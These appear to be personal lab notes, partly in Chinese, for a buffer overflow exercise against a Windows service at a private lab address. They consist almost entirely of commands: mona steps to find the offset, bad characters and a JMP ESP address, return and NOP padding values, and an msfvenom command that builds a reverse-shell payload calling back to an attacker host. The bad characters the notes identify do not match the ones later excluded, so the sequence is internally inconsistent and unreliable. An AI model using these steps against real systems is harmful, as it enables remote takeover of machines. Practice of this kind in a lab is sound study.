nc 10.10.183.68 1337

xfreerdp /u:admin /p:password /cert:ignore /v:10.10.183.68 /workarea

!mona config -set workingfolder c:\mona\%p

最大探测数：1400

生成指定长度不重复字节：（比fuzzing探测出来的字节长一点）
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1600

EIP 356B4134


找到offiset

!mona findmsp -distance 1600

!mona bytearray -b "\x00"

ESP 019DFA30

!mona compare -f C:\mona\oscp\bytearray.bin -a 019DFA30

POSSIBLY BAD CHARS: 8c,8d,ae,af,be,bf,fb,fc


!mona bytearray -b "\x00\x8c\xae\xbe\xfb"



ESP 01A4FA30

!mona compare -f C:\mona\oscp\bytearray.bin -a 01A4FA30


根据坏字节查找到可以利用的shellcode的静态地址
!mona jmp -r esp -cpb "\x00\x08\x2c\xad"


找到静态地址：625011af

retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16


生成shellcode:
msfvenom -p windows/shell_reverse_tcp LHOST=10.17.9.218 LPORT=4444 EXITFUNC=thread -b "\x00\x08\x2c\xad" -f c